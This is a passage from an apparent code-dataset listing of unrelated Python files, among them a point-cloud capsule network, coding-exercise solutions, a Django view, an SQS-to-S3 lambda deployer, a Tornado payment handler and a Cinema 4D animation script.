            rand_grid.data.uniform_(0, 1)
            y = torch.cat((rand_grid, x.transpose(2, 1)), 1).contiguous()
            # print(y.size())(8,18,32)
            outs.append(self.decoder[i](y))
            #print(outs[i].size()) #(8,3,32)
        # B
        # print(outs.size())
        # out_mean = torch.cat(outs,0).reshape(-1,4,3,self.latent_caps_size).contiguous()
        # out_mean = torch.mean(out_mean,dim=0).contiguous()
        # NOTE(review): batch size 32 is hard-coded here; this presumably
        # breaks (or broadcasts incorrectly) for other batch sizes — confirm.
        out_mean = torch.zeros((32,3,self.latent_caps_size)).cuda()
        for i in range(len(outs)):
            out_mean = out_mean + outs[i]
        out_mean = out_mean/self.nb_primitives
        # out_mean = out_mean
        #print(out_mean.size()) ([8, 3, 32])
        #print(torch.cat(outs, 0).reshape(-1,8,3,32).size())
        #(64,4,3,32)
        # print(torch.cat(outs, 2).size()) (8,3,2048)
        #(4,3,2048)
        return torch.cat(outs, 2).contiguous(),out_mean
class PointCapsNet(nn.Module):
    """Capsule autoencoder for point clouds: ConvLayer -> primary capsules ->
    latent capsules (dynamic routing) -> CapsDecoder reconstruction."""
    def __init__(self, prim_caps_size, prim_vec_size, latent_caps_size, latent_vec_size,
                 num_points):  # (1024,16,32,16,2048)
        super(PointCapsNet, self).__init__()
        self.conv_layer = ConvLayer()
        self.primary_point_caps_layer = PrimaryPointCapsLayer(prim_vec_size, num_points)
        # NOTE(review): capsule_groups_layer is constructed but never used in forward()
        self.capsule_groups_layer = PointGenCon(latent_vec_size + 2)
        self.latent_caps_layer = LatentCapsLayer(latent_caps_size, prim_caps_size, prim_vec_size, latent_vec_size)
        self.caps_decoder = CapsDecoder(latent_caps_size, latent_vec_size, num_points)
    def forward(self, data):
        """Return (latent_capsules, reconstructions, patch-mean, primary capsules)."""
        #print("1",data.size()) (8,3,2048)
        #print("data",data)
        x1 = self.conv_layer(data)
        x2 = self.primary_point_caps_layer(x1)
        latent_capsules = self.latent_caps_layer(x2)
        # print(latent_capsules.size()) (8,32,16)
        reconstructions,cap_Group = self.caps_decoder(latent_capsules)
        # print(reconstructions.size()) (8,3,2048)
        # print(cap_Group.size())
        # (4,3,32)
        # print("cap_Group",cap_Group)
        return latent_capsules, reconstructions , cap_Group, x2
    def loss(self, data, reconstructions):
        """Reconstruction loss between input and decoded point clouds."""
        return self.reconstruction_loss(data, reconstructions)
    def reconstruction_loss(self, data, reconstructions):
        # Symmetric Chamfer distance via the nndistance CUDA extension.
        data_ = data.transpose(2, 1).contiguous()
        reconstructions_ = reconstructions.transpose(2, 1).contiguous()
        dist1, dist2 = distChamfer(data_, reconstructions_)
        loss = (torch.mean(dist1)) + (torch.mean(dist2))
        return loss
class PointCapsNetDecoder(nn.Module):
    """Standalone decoder wrapper around CapsDecoder (e.g. for decoding saved
    latent capsules).  prim_caps_size/prim_vec_size are accepted for signature
    parity with PointCapsNet but unused.
    """
    def __init__(self, prim_caps_size, prim_vec_size, digit_caps_size, digit_vec_size, num_points):
        super(PointCapsNetDecoder, self).__init__()
        self.caps_decoder = CapsDecoder(digit_caps_size, digit_vec_size, num_points)
    def forward(self, latent_capsules):
        # NOTE(review): CapsDecoder.forward returns a (points, patch-mean)
        # tuple, so "reconstructions" here is that pair — confirm callers.
        reconstructions = self.caps_decoder(latent_capsules)
        return reconstructions
|
993,489 | 548cd6a03527b5fc77fbd595c8c2794fde6c3a96 | class Solution(object):
def numTrees(self, n):
"""
:type n: int
:rtype: int
"""
count = [0] * (n+1)
count[0],count[1] = 1,1
self.do(n,count)
return count[n]
def do(self,n,count):
if count[n] > 0:
return count[n]
res = 0
for j in xrange(n):
res += self.do(j,count)*self.do(n-1-j,count)
count[n] = res
return res |
993,490 | e64050d660e41bb7b148bb9b5eb6b347f9c688e9 | x = 10;
y = 20
# Build ten copies of each value (x is defined above) and print the
# concatenated list.
x_list = [x] * 10
y_list = [y] * 10
allnumbers = x_list + y_list
print(allnumbers)
993,491 | 39bede9dcb859084491e30f90bf64f30225d0000 | from urllib import request
# Yahoo Finance CSV export URL for TSLA; the `crumb` query parameter is a
# session token and presumably expires — TODO confirm before reuse.
url = 'https://query1.finance.yahoo.com/v7/finance/download/TSLA?period1=1521654485&period2=1524332885&interval=1d&events=history&crumb=o5Eu4tetf/L'
def download_stock_data(csv_url):
    """Fetch a CSV from csv_url and print its lines.

    NOTE(review): str(csv) stringifies the *bytes repr* ("b'...'"), which is
    why the split is on the literal two characters "\\n" rather than a real
    newline — consider csv.decode() instead.
    """
    response = request.urlopen(csv_url)
    csv = response.read()
    csv_str = str(csv)
    lines = csv_str.split("\\n")
    print(lines)
    '''
    dest_url = r'goog.csv'
    fw = open(dest_url,'w')
    for line in lines:
        fw.write(line + "\n")
    fw.close()
    '''
download_stock_data(url)
993,492 | fe39bbf58c6467eaadbf3ec2f11f5ecd78498d69 | '''
Author: Artur Assis Alves
Date : 07/04/2020
Title : Question 9
'''
import sys
#Functions:
def is_palindrome (word):
    '''
    Returns True if the string 'word' is a palindrome. Returns False otherwise.
    Input :
        word -> string
    Output:
        True/False -> bool
    '''
    # A string is a palindrome iff it equals its own reverse; slicing with a
    # step of -1 avoids the list/copy/reverse dance of the original.
    return word == word[::-1]
def test(did_pass):
    ''' Print the result of a test.

    did_pass -> bool: outcome of the assertion being reported.
    Prints "OK"/"FAILED" tagged with the caller's line number.
    (Translated note: function taken from the "Python 1.pptx" slides.)
    '''
    # sys._getframe(1) is CPython-specific: frame 1 is the *caller*, so the
    # reported line number points at the call site inside test_suite().
    linenum = sys._getframe(1).f_lineno # Get the caller's line number.
    if did_pass:
        msg = "Test at line {0} is OK.".format(linenum)
    else:
        msg = "Test at line {0} FAILED.".format(linenum)
    print(msg)
def test_suite():
    '''
    Run the suite of tests for code in this module (this file).
    (Translated note: function taken from the "Python 1.pptx" slides.)
    '''
    test(is_palindrome("abba"))
    test(not is_palindrome("abab"))
    test(is_palindrome("tenet"))
    test(not is_palindrome("banana"))
    test(is_palindrome("straw warts"))
    test(is_palindrome("a"))
    test(is_palindrome("")) #"" is a palindrome.
#Main:
# Run the self-tests only when executed as a script, not when imported.
if __name__=='__main__':
    test_suite()
|
993,493 | 8f27989245bdd7d0582b02e1ef2788cf19d13c85 | # https://www.hackerrank.com/challenges/apple-and-orange/problem
import math
import os
import random
import re
import sys
def countApplesAndOranges(s, t, a, b, apples, oranges):
    """Print how many apples, then how many oranges, land on Sam's house.

    s, t    : start / end of Sam's house (inclusive range)
    a, b    : positions of the apple tree and the orange tree
    apples  : fall distances relative to a
    oranges : fall distances relative to b
    """
    # A fruit lands on the house when its absolute position is within [s, t].
    # Chained comparisons replace the original bitwise `&` on booleans, and
    # sum() over a generator replaces the manual counter loops.
    sam_apples = sum(1 for d in apples if s <= a + d <= t)
    sam_oranges = sum(1 for d in oranges if s <= b + d <= t)
    print(sam_apples)
    print(sam_oranges)
# the below variable names are given by hackerrank which is not my naming style
if __name__ == '__main__':
    # stdin format (HackerRank): "s t", "a b", "m n", apples line, oranges line
    st = input().split()
    s = int(st[0])
    t = int(st[1])
    ab = input().split()
    a = int(ab[0])
    b = int(ab[1])
    mn = input().split()
    m = int(mn[0])  # m and n (array lengths) are read but never used
    n = int(mn[1])
    apples = list(map(int, input().rstrip().split()))
    oranges = list(map(int, input().rstrip().split()))
    countApplesAndOranges(s, t, a, b, apples, oranges)
|
993,494 | bdbb1abd3d2f6ced4c18c87f5b1be227be3d5a8f | """Convert :term:`BAM` format to :term:`BED` formats"""
from biokit.converters.convbase import ConvBase
__all__ = ["Bam2Bed"]
class Bam2Bed(ConvBase):
    """Convert sorted :term:`BAM` file into :term:`BED` file

    ::

        samtools depth -aa INPUT > OUTPUT

    NOTE(review): ``samtools depth`` emits per-base coverage rows
    (chrom, pos, depth), not standard 3-column BED intervals --
    confirm the intended output format with downstream consumers.
    """
    def __init__(self, infile, outfile, *args, **kargs):
        """.. rubric:: constructor

        :param str infile: input BAM file. **It must be sorted**.
        :param str outfile: output BED file
        """
        super(Bam2Bed, self).__init__(infile, outfile, *args, **kargs)

    def convert(self):
        # Delegates shell execution to ConvBase.execute; '-aa' reports every
        # reference position, including those with zero coverage.
        cmd = "samtools depth -aa {} > {}".format(self.infile, self.outfile)
        self.execute(cmd)
|
993,495 | 149ab6b0b6cae924992b32e6d93399ed66e9455b | from __future__ import absolute_import
from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from django.views.decorators.csrf import csrf_exempt
from Backoffice.models import Session_utilisateur, Commercial, Magasinvdsa, Admin
import json
import Dashboard
from Dashboard import views as query_view
def geolocalisation(request):
    """Render the geolocation page with the filter lists (sales reps, stores,
    product families) plus the identity of the currently logged-in user.
    """
    # ---> tuples of (id, last name, first name) for every sales rep
    representants=query_view.sql_list_com();
    # ---> tuples of (id, name) for every store
    magasins= query_view.sql_list_mag();
    # ---> tuples of (id, name) for every product family
    familles = query_view.sql_list_fam();
    # The "session" is the last row of the session table.
    # NOTE(review): that is global state, not per-request -- concurrent users
    # would share the same session row; confirm this is intended.
    email_s = Session_utilisateur.objects.all().last().email_s
    statut = Session_utilisateur.objects.all().last().statut_s
    if statut == "commercial":
        id = Commercial.objects.get(email = email_s).id
        nom = Commercial.objects.get(email = email_s).nom
        prenom = Commercial.objects.get(email = email_s).prenom
    elif statut == "directeur":
        id = Magasinvdsa.objects.get(email_directeur = email_s).id
        # NOTE(review): the two lookups below filter on 'email' while the id
        # lookup above uses 'email_directeur' -- likely inconsistent; confirm
        # the actual Magasinvdsa field name.
        nom = Magasinvdsa.objects.get(email = email_s).nom_directeur
        prenom = Magasinvdsa.objects.get(email = email_s).prenom_directeur
    elif statut == "administrateur":
        id = Admin.objects.get(email = email_s).id
        nom = Admin.objects.get(email = email_s).nom
        prenom = Admin.objects.get(email = email_s).prenom
    # NOTE(review): if statut matches none of the branches, id/nom/prenom are
    # unbound and the render below raises NameError.
    return render(request,"Geolocalisation/geolocalisation.html",{
        "representants" : representants,
        "magasins": magasins,
        "familles" : familles,
        "id": id,
        "statut": statut,
        "email_s":email_s,
        "nom":nom,
        "prenom":prenom
    })
# ---> tuples of (id, name) of the sub-families for the family id 'fid_fam'
# carried by the AJAX request
@csrf_exempt
def sql_list_sous_fam(request):
    # (Translated note) a ValueError must be handled for the case where the
    # value is "null", i.e. when the user selects all families -- currently
    # int() would raise unhandled.
    id_famille = int(request.POST['fid_fam'])
    # Debug trace of the family id received from the client.
    print("id famille envoyer par django:",id_famille)
    jsonResponse = query_view.sql_list_sous_fam(request)
    return jsonResponse
|
993,496 | c70000071ebb05e92516a7f948e10c4f9d08964e | #!/usr/bin/env python
import argparse
from sqs_s3_logger.environment import Environment
from sqs_s3_logger.lambda_function_builder import build_package, ROLE_NAME, ROLE_POLICY
def get_environment(args):
    """Build an Environment from parsed CLI args, defaulting the lambda
    function name to '<queue>-to-<bucket>' when -f/--function was omitted.
    """
    if args.function is None:
        f_name = '{}-to-{}'.format(args.queue, args.bucket)
    else:
        f_name = args.function
    return Environment(
        queue_name=args.queue,
        bucket_name=args.bucket,
        function_name=f_name
    )
def create(args):
    # Build the lambda deployment package, ensure the IAM role/policy exist,
    # then deploy (or replace) the function on the requested schedule.
    env = get_environment(args)
    package_file = build_package()
    role_arn = env.update_role_policy(ROLE_NAME, ROLE_POLICY)
    env.update_function(role_arn, package_file, schedule=args.schedule)
def purge(args):
    # Tear down the queue/bucket wiring and delete the lambda function too.
    env = get_environment(args)
    env.destroy(delete_function=True)
def main():
    """CLI entry point: parse arguments and dispatch to create/purge."""
    parser = argparse.ArgumentParser()
    # NOTE(review): the trailing comma below makes this statement a 1-tuple;
    # harmless, but presumably accidental.
    parser.add_argument('command', nargs='?', default='create',
                        help='create(default) / purge'),
    parser.add_argument('-b', '--bucket', required=True,
                        help='Name of the bucket to drop logs to')
    parser.add_argument('-q', '--queue', required=True,
                        help='Name of the queue to be used')
    parser.add_argument('-f', '--function',
                        help='Name of the read/push function - will be replaced if exists')
    parser.add_argument('-s', '--schedule', default='rate(1 day)',
                        help='A cron/rate at which the function will execute.')
    args = parser.parse_args()
    # NOTE(review): an unrecognized command silently does nothing.
    if args.command == 'create':
        create(args)
    elif args.command == 'purge':
        purge(args)


if __name__ == '__main__':
    main()
|
993,497 | 92d121e956e69ce3cea995773f6f4208f734dd56 | # -*- coding: utf-8 -*-
import time
import tornado.web
import tornado.gen
import tornado.httpclient
import url
from util import dtools, security, httputils
from handler.site_base import SiteBaseHandler
class OrderHandler(SiteBaseHandler):
    """Payment-order endpoint: POST creates a prepay order with the merchant
    gateway, GET queries an order's state by merchant order number.

    NOTE(review): gateway semantics (prepay_id, mch_id, MD5 signing) are
    inferred from field names -- confirm against the payment provider docs.
    """

    @tornado.gen.coroutine
    def post(self, siteid):
        # Required and optional request arguments.
        parse_args = self.assign_arguments(
            essential=['appid',
                       'title',
                       'out_trade_no',
                       'total_fee',
                       'spbill_create_ip',
                       'trade_type'],
            extra=[('detail', ''),
                   ('unionid', ''),
                   ('openid', '')]
        )
        # The payer must be identified by unionid or openid.
        if not parse_args.get('unionid') and not parse_args.get('openid'):
            raise tornado.web.HTTPError(400)
        # Copy/rename the fields the gateway expects ('title' -> 'body').
        req_data = dtools.transfer(
            parse_args,
            copys=['appid',
                   'out_trade_no',
                   'detail',
                   'total_fee',
                   'spbill_create_ip',
                   'trade_type',
                   'openid'],
            renames=[('title', 'body')]
        )
        # Resolve openid from unionid when it was not supplied directly.
        if not req_data.get('openid'):
            req_data['openid'] = self.storage.get_user_info(appid=parse_args['appid'],
                                                            unionid=parse_args['unionid'],
                                                            select_key='openid')
        appinfo = self.storage.get_app_info(appid=req_data['appid'])
        if not appinfo:
            # Unknown app id.
            self.send_response(err_code=3201)
            raise tornado.gen.Return()
        # Attach site context, merchant id and the site's payment callback URL.
        req_data.update(
            {
                'attach': 'siteid=' + siteid,
                'mch_id': appinfo.get('mch_id'),
                'notify_url': self.storage.get_site_info(siteid, select_key='pay_notify_url')
            }
        )
        req_key = appinfo['apikey']
        security.add_sign(req_data, req_key)
        try:
            resp = yield httputils.post_dict(url=url.mch_order_add, data=req_data, data_type='xml')
        except tornado.httpclient.HTTPError:
            # Gateway unreachable / HTTP-level failure.
            self.send_response(err_code=1001)
            raise tornado.gen.Return()
        resp_data = self.parse_payment_resp(resp, req_key)
        if resp_data:
            # Re-sign the prepay bundle for the client SDK; the signature is
            # computed over the camelCase keys.
            real_sign_data = {
                'appId': resp_data['appid'],
                'timeStamp': str(int(time.time())),
                'nonceStr': security.nonce_str(),
                'package': 'prepay_id=' + resp_data['prepay_id'],
                'signType': 'MD5'
            }
            post_resp_data = {
                'appid': real_sign_data['appId'],
                'timestamp': real_sign_data['timeStamp'],
                'noncestr': real_sign_data['nonceStr'],
                'prepay_id': resp_data['prepay_id'],
                'sign_type': real_sign_data['signType'],
                'pay_sign': security.build_sign(real_sign_data, req_key)
            }
            self.send_response(post_resp_data)

    @tornado.gen.coroutine
    def get(self, siteid, out_trade_no):
        # Query the order state at the gateway by merchant order number.
        appid = self.get_argument('appid')
        appinfo = self.storage.get_app_info(appid=appid)
        if not appinfo:
            self.send_response(err_code=3201)
            raise tornado.gen.Return()
        # Empty transaction_id means "look up by out_trade_no".
        req_data = {
            'appid': appid,
            'mch_id': appinfo.get('mch_id'),
            'transaction_id': '',
            'out_trade_no': out_trade_no
        }
        req_key = appinfo['apikey']
        security.add_sign(req_data, req_key)
        try:
            resp = yield httputils.post_dict(url=url.mch_order_query, data=req_data, data_type='xml')
        except tornado.httpclient.HTTPError:
            self.send_response(err_code=1001)
            raise tornado.gen.Return()
        resp_data = self.parse_payment_resp(resp, req_key)
        if resp_data:
            # Forward only the client-relevant subset of the gateway reply.
            post_resp_data = dtools.transfer(
                resp_data,
                copys=[
                    'appid',
                    'openid',
                    'trade_state',
                    'out_trade_no',
                    'total_fee',
                    'transaction_id',
                    'time_end'
                ]
            )
            self.send_response(post_resp_data)
|
993,498 | 74a370248526ad8c934836925fad344ddd72c216 | import os, math, numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import DBSCAN, KMeans
from sklearn.decomposition import PCA
from sklearn import preprocessing
from bathyml.common.training import getParameterizedModel
from mpl_toolkits.mplot3d import Axes3D
def read_csv_data( fileName: str, nBands: int = 0 ) -> np.ndarray:
    """Load a comma-separated array from <ddir>/csv/<fileName>.

    When nBands is positive, only the first nBands columns are kept.
    """
    csv_path: str = os.path.join(ddir, "csv", fileName)
    table: np.ndarray = np.loadtxt(csv_path, delimiter=',')
    return table[:, :nBands] if nBands > 0 else table
def compute_cluster_centroids(clusters: np.ndarray, data: np.ndarray) -> np.ndarray:
    """Mean point of each cluster, stacked in order of first appearance.

    clusters: per-row cluster label for data; data: (n_points, n_features).
    """
    members = {}
    # Group the rows by label; dict preserves first-appearance order.
    for label, point in zip(clusters, data):
        members.setdefault(label, []).append(point)
    centroids = [sum(points) / len(points) for points in members.values()]
    return np.stack(centroids, axis=0)
# Paths: assumes a <repo>/data/csv layout relative to this file.
thisDir = os.path.dirname(os.path.abspath(__file__))
ddir = os.path.join(os.path.dirname(os.path.dirname(thisDir)), "data", "csv")

# Experiment configuration.
nBands = 21
whiten = False
typeLabel = "train"
validation_fraction = 0.2
clusterIndex = 1
modelType = "mlp"

# Columns: 0-1 = x/y location, 2 = depth, 3.. = band values
# (assumed from the slicing below -- TODO confirm against the CSV schema).
datafile = os.path.join(ddir, f'lake_data_{typeLabel}.csv' )
dataArray: np.ndarray = np.loadtxt( datafile, delimiter=",")
xyData = dataArray[:,0:2]

# Spatial clustering of sample locations.
db = DBSCAN(eps=600.0, min_samples=8).fit(xyData)
clusters: np.ndarray = db.labels_
cmaxval = clusters.max()
ccolors = (db.labels_ + 1.0) * (255.0 / cmaxval)  # NOTE(review): computed but never used

loc0: np.ndarray = dataArray[:,0]
loc1: np.ndarray = dataArray[:,1]
zd: np.ndarray = dataArray[:,2]
colorData = dataArray[:,3:nBands+3]
cnorm = preprocessing.scale( colorData )  # zero-mean / unit-variance per band

# PCA in band space; the magic offsets/scale below define an ellipse in the
# first two components that splits the points into two groups.
pca = PCA(n_components=3, whiten=whiten)
color_point_data_pca = pca.fit(colorData).transform(colorData)
cx = color_point_data_pca[:, 0]
cy = color_point_data_pca[:, 1]
cdx, cdy = ( cx + 674.253 )/300.0, ( cy + 321.075 )/300.0
mask0 = (cdx*cdx + cdy*cdy) < 1.0
# clusterIndex selects inside (0) vs outside (non-zero) the ellipse.
mask = mask0 if clusterIndex == 0 else mask0 == False

# Train/validation split -- note: no shuffling, split follows file order.
xdata = cnorm[ mask ]
ydata = zd[ mask ]
NValidationElems = int(round(xdata.shape[0] * validation_fraction))
NTrainingElems = xdata.shape[0] - NValidationElems
model_label = "-".join([modelType, str(clusterIndex), str(validation_fraction)])

x_train = xdata[:NTrainingElems]
x_test = xdata[NTrainingElems:]
y_train = ydata[:NTrainingElems]
y_test = ydata[NTrainingElems:]

model = getParameterizedModel( modelType )
model.fit(x_train, y_train)

prediction_training = model.predict(x_train)
prediction_validation = model.predict(x_test)

# RMS error on the held-out set.
diff = prediction_validation - y_test
validation_loss = math.sqrt((diff * diff).mean())
print(f" --> loss={validation_loss}")

# Training-fit plot. NOTE(review): string subplot specs like "211" are
# deprecated in matplotlib; also the "validation data" label on the training
# series looks swapped with "training data" in the second plot.
diff = y_train - prediction_training
mse = math.sqrt((diff * diff).mean())
ax0 = plt.subplot("211")
ax0.set_title(f"{model_label} Training Data MSE = {mse:.2f} ")
xaxis = range(prediction_training.shape[0])
ax0.plot(xaxis, y_train, "b--", label="validation data")
ax0.plot(xaxis, prediction_training, "r--", label="prediction")
ax0.legend()
plt.show()

# Validation-fit plot; ref_mse is the error of predicting all zeros.
diff = y_test - prediction_validation
ref_mse = math.sqrt((y_test * y_test).mean())
mse = math.sqrt((diff * diff).mean())
print(f" REF MSE = {ref_mse} ")
ax1 = plt.subplot("212")
ax1.set_title(f"{model_label} Validation Data MSE = {mse:.2f} ")
xaxis = range(prediction_validation.shape[0])
ax1.plot(xaxis, y_test, "b--", label="training data")
ax1.plot(xaxis,prediction_validation, "r--", label="prediction")
ax1.legend()
plt.show()
|
993,499 | d1c0eab6bd5890577fa6bcd4219c0d32a0e182a1 | """Name-en-US: Animate on Spline
Description-en-US: Creates an Align To Spline tag with keys at the start/end of animation.
Written for CINEMA 4D R14.025
LICENSE:
Copyright (C) 2012 by Donovan Keith (www.donovankeith.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE
INSTRUCTIONS:
1. Select the object(s) you want to animate along a spline
2. Continue selecting, select the spline you want to animate onto last.
3. Run the "Animate on Spline" command.
WHAT HAPPENED:
You now have an align to spline tag with keys on the first and last frames
it is pointing to the spline you selected last, or to nothing if
you did not select a spline last.
TO DO:
Add support for auto-assign-to-spline even if spline
isn't the last object in a list of objects.
CHANGELOG:
v0.01: Created basic functionality.
-
Name-US: Animate on Spline
Description-US: Takes the selected objects, and adds an Align To Spline tag with keyframes.
"""
import c4d
def main():
    """Add an Align To Spline tag to every selected object, keyed from 0%
    at the document's first frame to 100% at its last frame.

    If the last-selected object is a spline, it becomes the alignment
    target for all the others; otherwise the tags are created unassigned.
    """
    doc.StartUndo()

    # Get the active objects in selection order.
    objs = doc.GetActiveObjects(flags=c4d.GETACTIVEOBJECTFLAGS_SELECTIONORDER)

    # Nothing selected: nothing to do.
    if len(objs) == 0:
        return

    # The spline is the last object in the list.
    spline = None
    if len(objs) > 1:
        # Test to see if the last object is a spline; if so, amend the list.
        if objs[-1].GetRealSpline():
            spline = objs.pop()
        # If the user only selected two objects, don't worry about order.
        # Fix: the original tested `objs[0].GetRealSpline` (the bound method,
        # which is always truthy) instead of calling it.
        elif (len(objs) == 2) and objs[0].GetRealSpline():
            objs.reverse()
            spline = objs.pop()

    # Uniform interpolation gives constant speed along the spline.
    if spline is not None:
        doc.AddUndo(c4d.UNDOTYPE_CHANGE_SMALL, spline)
        spline[c4d.SPLINEOBJECT_INTERPOLATION] = 2

    # Preload start/end times of the document's animation range.
    start_time = doc.GetMinTime()
    end_time = doc.GetMaxTime()

    # Keep track of whether any tags are already selected.
    selected = False

    for obj in objs:
        # Add an Align To Spline tag.
        tag = c4d.BaseTag(c4d.Taligntospline)
        if spline is not None:
            tag[c4d.ALIGNTOSPLINETAG_LINK] = spline
        obj.InsertTag(tag)

        # Create an animation track on the tag's Position parameter.
        track = c4d.CTrack(tag, c4d.DescID(c4d.DescLevel(
            c4d.ALIGNTOSPLINETAG_POSITION, c4d.DTYPE_REAL, 0)))
        tag.InsertTrackSorted(track)
        curve = track.GetCurve()

        # Key at the first frame: 0% along the spline.
        start_key = c4d.CKey()
        start_key.SetTime(curve, start_time)
        start_key.SetValue(curve, 0.0)
        curve.InsertKey(start_key)

        # Key at the last frame: 100% along the spline.
        end_key = c4d.CKey()
        end_key.SetTime(curve, end_time)
        end_key.SetValue(curve, 1.0)
        curve.InsertKey(end_key)

        # Apply the document's default key interpolation to both keys.
        curve.SetKeyDefault(doc, 0)  # Key 0: Start Key
        curve.SetKeyDefault(doc, 1)  # Key 1: End Key

        # Select the new tags (first replaces the selection, the rest add).
        if not selected:
            doc.SetActiveTag(tag, c4d.SELECTION_NEW)
            selected = True
        else:
            doc.SetActiveTag(tag, c4d.SELECTION_ADD)

        doc.AddUndo(c4d.UNDOTYPE_NEW, tag)

    doc.EndUndo()
    c4d.EventAdd()


if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.